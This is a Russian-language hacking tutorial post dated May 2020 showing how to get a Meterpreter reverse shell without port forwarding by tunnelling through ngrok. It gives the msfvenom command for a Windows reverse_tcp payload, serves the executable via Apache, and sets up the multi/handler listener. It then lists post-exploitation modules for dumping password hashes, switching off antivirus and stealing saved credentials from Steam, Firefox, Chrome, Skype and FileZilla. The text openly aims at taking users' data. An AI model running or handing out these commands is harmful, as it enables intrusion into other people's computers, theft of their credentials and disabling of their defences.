May 10, 2020

Metasploit + Meterpreter

Привет парни,сегодня я вам покажу как можно получить обратное подключение без прокидывания портов .

Для этого нам понадобиться три утилиты metasploit и ngrok.

Думаю про metasploit ничего говорить не нужно тут всё предельно ясно

Ngrok — это платформа, которая с помощью установленной утилиты, позволяет, организовать удалённый доступ на веб-сервер или какой-то другой сервис,

Для начало нам надо зарегистрировать аккаунт ngrok. Переходим на сайт https://ngrok.com

регистрируем аккаунт , после чего выполняем эти команды дабы не делать лишние клики

wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip && unzip ngrok-stable-linux-amd64.zip

Далее получаем наш токен,он потом сохраниться в yml формате,после чего можно будет просто прописывать ./ngrok

После запуска ngrok, вы увидете это

tcp://0.tcp.ngrok.io:12113 -> localhost:4444

Проще говоря,наш трафик будет идти сюда 0.tcp.ngrok.io через порт 12113 будет перенаправляться к нам на основную машину, эту косноль не закрываем,создаем новую!

Сейсас мы создадим пейлоад msfvenom -p windows/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=13286 -f exe > payload.exe

На моем примере я создал полезную нагрузку для винды,так-же можно выбрать архитектуру но я не стал этого делать,чтобы перекинуть это чудо на виртуалку в моем случае можно воспользоваться apache,сперва нам нужно узнать свой локальный ip

командой ifconfig , после чего прописать systemctl start apache2 и перейти по этому пути /var/www/html/ и удалить html файл, и поставить свой пейлоад

Теперь нам нужно запустить саму metasploit , для этого воспользуемся командой msfconsole

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost localhost
set lport 4444
exploit

Давайте соберем больше информации, о нашей тачке для этого можно использовать две команды sysinfo

После этого нам нужно проверить тачку на виртуалку командой run checkvm

run wineum мы получаем хэш паролей, настройки системы, список пользователей и многое другое

Run scraper получаем информацию из реестра , информации о сетевом подключении, маску сети и многое другое

run getcountermeasure проверяет установки безопасности на тачке,и может отключить защиту мало вероятно,можем заметить что нам рекомендуют использовать run post/windows/manage/killav чтобы попытаться отключить защиту на тачке

Иногда оно отключает защиту, вместо того чтобы писать длинную команду можно использовать короткую run killav,и с небольшим шансом мы выключим защиту но это не точно.

Давайте попробуем узнать что установлено на машине, использовав команду run post/windows/gather/enum_applications , в большой вероятности мы увидим разные браузеры и стим ,благо есть плагины которые позволяют украсть данные у пользователя

  • run post/windows/gather/credentials/steam
  • run post/multi/gather/firefox_creds FireFox
  • run post/windows/gather/enum_ie – Дно Эксплорер
  • run post/windows/gather/enum_chrome Google Chrome (не работает)
  • run post/windows/gather/credentials/skype Skype
  • run post/windows/gather/credentials/filezilla_server – чек на файлзиллу
  • run post/windows/gather/win_privs – Права текущего пользователя